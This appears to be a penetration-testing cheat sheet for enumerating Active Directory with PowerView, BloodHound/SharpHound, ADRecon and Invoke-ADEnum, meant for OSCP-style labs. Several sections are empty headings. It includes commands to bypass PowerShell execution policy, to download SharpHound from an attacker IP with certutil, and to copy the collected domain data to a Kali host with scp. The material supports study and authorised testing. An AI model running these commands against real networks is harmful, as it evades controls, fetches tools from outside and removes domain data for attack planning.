AD Enumeartion Manual & Automated
This section covers practical techniques for enumerating Active Directory environments during internal assessments. It includes multiple methods to extract information about domain users, groups, computers, trusts, and permissions using tools like rpcclient, ldapsearch, BloodHound, and PowerView. These enumeration steps are essential for identifying attack paths, privilege escalation opportunities, and domain misconfigurations — particularly in OSCP-style labs and real-world engagements.
Before starting enumeartion make sure to bypass powershell execution using command powershell -ep bypass. Then you'll be able to import scripts and execute them.
Enumeartion Using PowerView
Import PowerView Module before starting the enumeartion
Import-Module .\PowerView.ps1
User and group enumeration
1. All users and user details in Domain
Get-DomainUser
Filter specific set of information from the command result using select filter of powershell
Get-DomainUser | select cn, memberof
Domain and trust discovery
1. Domain Info
Get-Domain
- Domain Controller Info
Get-DomainController
ACLs and object permissions
SPN enumeration
GPO discovery
Enumeration using Built-in PowerShell
Native PowerShell AD cmdlets (requires RSAT or domain privileges)
User, group, and computer enumeration
Example: Get-ADUser, Get-ADGroupMember, Get-ADComputer
Bonus: using Get-WmiObject or Get-CimInstance for host-based data
Enumeration using BloodHound / SharpHound
Automated graph-based enumeration
Enumerates trusts, sessions, ACLs, admin rights, group memberships
Includes collector examples and how to import into the GUI
Example: SharpHound.exe -c All, BloodHound GUI analysis
Enumeration using rpcclient and net commands
Enumeration using ldapsearch / ldapdomaindump
Autmated Enumeation
Enumerating using ADRecon
ADRecon is a powerful PowerShell-based Active Directory reconnaissance script that collects a comprehensive range of domain information and exports it into structured Excel and CSV reports. It is particularly useful for red teamers, blue teamers, and auditors who need a high-level overview of the AD environment, including users, groups, trusts, GPOs, ACLs, DNS records, and more.
Great tool for automating the Active Directory Enumeration:
Prerequisites for using ADRecon
NET Framework 3.0 or later (Windows 7 includes 3.0)
PowerShell 2.0 or later (Windows 7 includes 2.0)
Powershell Core on Windows is supported (Tested on PowerShell v7.2.2 running on Windows 10)
Enumerating Using Invoke-ADEnum
Invoke-ADEnum is a lightweight PowerShell script designed to automate Active Directory enumeration for red teamers and penetration testers. It gathers a broad range of domain information such as users, groups, computers, trust relationships, domain policies, and shares — using built-in PowerShell commands. This makes it highly effective in environments where importing large frameworks like PowerView or using SharpHound may not be feasible.
Using BloodHound
Using Sharphound to Collect data and BloodHound to Analyze data
Using SharpHuond
Step 1: Download SharpHound in Windows Machine
certutil -urlcache -split -f http://192.168.45.222/SharpHound.ps1
If this does not work you can try these Methods
Step 2: Import Sharphound to the PowerShell
Import-Module .\Sharphound.ps1
Step 3: Invoke BloodHound for data collection
Invoke-BloodHound -CollectionMethod All -OutputDirectory $pwd -OutputPrefix "Pawan_audit"
Selecting -CollectionMethod as All to Collect Everything, You can check more info using command
Get-Gelp Invoke-BloodHound.
Step 4: Get the audit zip file to your kali machine.
Enable ssh in kali and then push it , if there are no other options available.
scp "C:\path\to\local\file.txt" kali@<Kali_IP_Address>:/home/kali/Documents/directory/
Step 5 : Start neo4j in kali
sudo neo4j start
Step 6: Start BlodHound
sudo bloodhound
Step 7:
Upload your audit.zip file in the blood hound and analyze the result.
Do check the version compability of the sharphound and Bloodhound that you use. SharpHound Version 2.0.0 Is compatible with BloodHound Version 4.3.1 . Or Try using Sharphound with the installed Bloodhound /usr/lib/bloodhound/resources/app/Collectors , Or if using BloodHoundCE thn you can download SharpHound Collector from the web interface.
📚 References
- PowerSploit PowerView - You can learn about PowerView in detail.
- Sharphound
- ADRecon
- Invoke-ADEnum